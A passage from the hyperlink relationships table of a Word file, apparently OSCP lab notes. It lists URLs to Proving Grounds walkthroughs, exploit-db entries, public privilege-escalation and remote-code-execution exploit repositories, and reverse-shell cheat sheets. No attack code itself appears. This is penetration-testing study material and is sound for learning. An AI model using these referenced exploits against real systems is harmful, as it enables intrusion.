Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_like.asp" TargetMode="External"/><Relationship Id="rId694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-pelican-7021741caa2e" TargetMode="External"/><Relationship Id="rId1047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-squid-1bc1e2dbb8d4" TargetMode="External"/><Relationship Id="rId1289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/09/monitoring-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image530.png"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image430.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://launchpad.net/ubuntu/+source/openssh" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/577402/ssh-error-while-logging-in-using-private-key-loaded-pubkey-invalid-format-and" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_shell" TargetMode="External"/><Relationship Id="rId1070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/PwnKit" TargetMode="External"/><Relationship Id="rId1071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId1072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@cyberarri/sunsetdecoy-pg-play-writeup-8728ae583dac" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image526.png"/><Relationship Id="rId1073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secybr.com/posts/snmp-pentesting-best-practicies/" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId1074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html?highlight=snmp#1611621016110162udp---pentesting-snmp" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image529.png"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId1075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html?highlight=snmp#1611621016110162udp---pentesting-snmp" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/offensive-security-walk-throughs/oscp-proving-grounds-walkthrough-pebbels-4598805db790" TargetMode="External"/><Relationship Id="rId1076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=3405s" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image500.png"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_shell" TargetMode="External"/><Relationship Id="rId1077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image554.png"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/select-into.html" TargetMode="External"/><Relationship Id="rId1078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=1180s" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image545.png"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/select-into.html" TargetMode="External"/><Relationship Id="rId1079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=1180s" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image349.png"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image557.png"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/r/oscp/comments/190eesr/pebbles_proving_grounds_practice_without_sqlmap/" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image548.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/41239" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sudsy-fireplace-912.notion.site/Pebbles-from-Proving-Grounds-without-SQLMap-by-Luis-Moret-lainkusanagi-23b29df77e6946a6bb8cb213a76a9ac8" TargetMode="External"/><Relationship Id="rId1060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.png"/><Relationship Id="rId1061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sumo-81-100-7de98134702" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases/tag/v1.7.7" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bing0o.github.io/posts/pg-hawat/" TargetMode="External"/><Relationship Id="rId1062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CptGibbon/CVE-2021-3156" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases/tag/v1.7.7" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId1063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image432.png"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/blind#exploiting-blind-sql-injection-by-triggering-time-delays" TargetMode="External"/><Relationship Id="rId1064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-cockpit-7e777892e485" TargetMode="External"/><Relationship Id="rId1065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeammond/CVE-2021-4034" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image456.png"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image325.png"/><Relationship Id="rId1066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.url-encode-decode.com/" TargetMode="External"/><Relationship Id="rId1067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeammond/CVE-2021-4034" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image474.png"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-hawat-3c4d2c388d7f" TargetMode="External"/><Relationship Id="rId1068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image466.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image489.png"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bing0o.github.io/posts/pg-hawat/" TargetMode="External"/><Relationship Id="rId1069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@spAce0x/djinn-3-pg-play-write-up-dab19749c5e4" TargetMode="External"/><Relationship Id="rId1015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/44340?source=post_page-----88a3e0e21f62---------------------------------------" TargetMode="External"/><Relationship Id="rId1257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rekter0/exploits.git" TargetMode="External"/><Relationship Id="rId1016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId1258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rekter0/exploits.git" TargetMode="External"/><Relationship Id="rId1017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f" TargetMode="External"/><Relationship Id="rId1259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId1018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId1019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swapravo/polkadots" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image492.png"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-61-proving-grounds-lavita-05d148d4fbfc" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics" TargetMode="External"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/cybersploit-1-vulnhub-walkthrough-8537c7b71dcf" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image270.png"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-play-pwned1-walkthrough-651ce326d091" TargetMode="External"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image346.png"/><Relationship Id="rId660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image300.png"/><Relationship Id="rId1250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image209.png"/><Relationship Id="rId1251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image264.png"/><Relationship Id="rId1010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3" TargetMode="External"/><Relationship Id="rId1252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CSpanias/vesta-rce-exploit" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-hardening/privilege-escalation" TargetMode="External"/><Relationship Id="rId664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId1011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3" TargetMode="External"/><Relationship Id="rId1253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md" TargetMode="External"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId1012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId1254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation" TargetMode="External"/><Relationship Id="rId662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId1013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@yogasatriautama/pg-nukem-296392de8e96#bypass" TargetMode="External"/><Relationship Id="rId1255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssd-disclosure.com/ssd-advisory-vestacp-lpe-vulnerabilities/" TargetMode="External"/><Relationship Id="rId661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image374.png"/><Relationship Id="rId1014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId1256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rekter0/exploits/tree/master/VestaCP" TargetMode="External"/><Relationship Id="rId1004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image332.png"/><Relationship Id="rId1246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oscp:20000" TargetMode="External"/><Relationship Id="rId1005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId1247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image261.png"/><Relationship Id="rId1006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sunsetmidnight-84-100-bc230e87baa2" TargetMode="External"/><Relationship Id="rId1248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image563.png"/><Relationship Id="rId1007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/sunset-midnight-walkthrough-proving-grounds-08ad53b2200a" TargetMode="External"/><Relationship Id="rId1249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50234" TargetMode="External"/><Relationship Id="rId1008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image460.png"/><Relationship Id="rId1009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diego-treitos/linux-smart-enumeration" TargetMode="External"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image244.png"/><Relationship Id="rId899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/dpkg" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50983" TargetMode="External"/><Relationship Id="rId656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image527.png"/><Relationship Id="rId898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/dpkg" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/pc-proving-grounds-practice-walkthrough-7619983c7d63" TargetMode="External"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-tre-92-100-9b73ef8d0918" TargetMode="External"/><Relationship Id="rId897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.png"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image390.png"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image266.png"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://borgbackup.readthedocs.io/en/stable/usage/extract.html" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image351.png"/><Relationship Id="rId891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId1240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/IOActive/jdwp-shellifier" TargetMode="External"/><Relationship Id="rId1241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image360.png"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/gaara-write-up-provinggrounds-vulnhub-0168a5beb32e" TargetMode="External"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId1000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId1242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image275.png"/><Relationship Id="rId652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId1001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#URI_references" TargetMode="External"/><Relationship Id="rId1243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image338.png"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/icmp-walkthrough-proving-grounds-92b43fa18823" TargetMode="External"/><Relationship Id="rId893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#URI_references" TargetMode="External"/><Relationship Id="rId1244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image267.png"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackmd.io/@rudefish/offsec-pg-bbscute-easy" TargetMode="External"/><Relationship Id="rId892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image364.png"/><Relationship Id="rId1245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oscp:20000" TargetMode="External"/><Relationship Id="rId1037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mr-tuhin/CVE-2021-22204-exiftool" TargetMode="External"/><Relationship Id="rId1279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId1038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@danielndias/pg-practice-exfiltrated-4bd4e9b5bc2b" TargetMode="External"/><Relationship Id="rId1039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image546.png"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image542.png"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image365.png"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image317.png"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image255.png"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image268.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image240.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image249.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image464.png"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.png"/><Relationship Id="rId1270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-69-proving-grounds-clue-91eb61a5af44" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/glasgow-smile-1-proving-groundswalkthrough-521b2fee1317" TargetMode="External"/><Relationship Id="rId682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@gayemans1003/offsec-proving-grounds-zab-walkthrough-4092a2c8c904" TargetMode="External"/><Relationship Id="rId1271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49362?source=post_page-----91eb61a5af44---------------------------------------" TargetMode="External"/><Relationship Id="rId681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://routezero.security/2025/02/18/proving-grounds-practice-wallpaperhub-walkthrough/" TargetMode="External"/><Relationship Id="rId1030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image301.png"/><Relationship Id="rId1272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47799" TargetMode="External"/><Relationship Id="rId680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image361.png"/><Relationship Id="rId1031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-exfiltrated-4c11efba893d" TargetMode="External"/><Relationship Id="rId1273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47799" TargetMode="External"/><Relationship Id="rId1032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image520.png"/><Relationship Id="rId1274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/cassandra.html" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.png"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image517.png"/><Relationship Id="rId686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId1033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId1275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 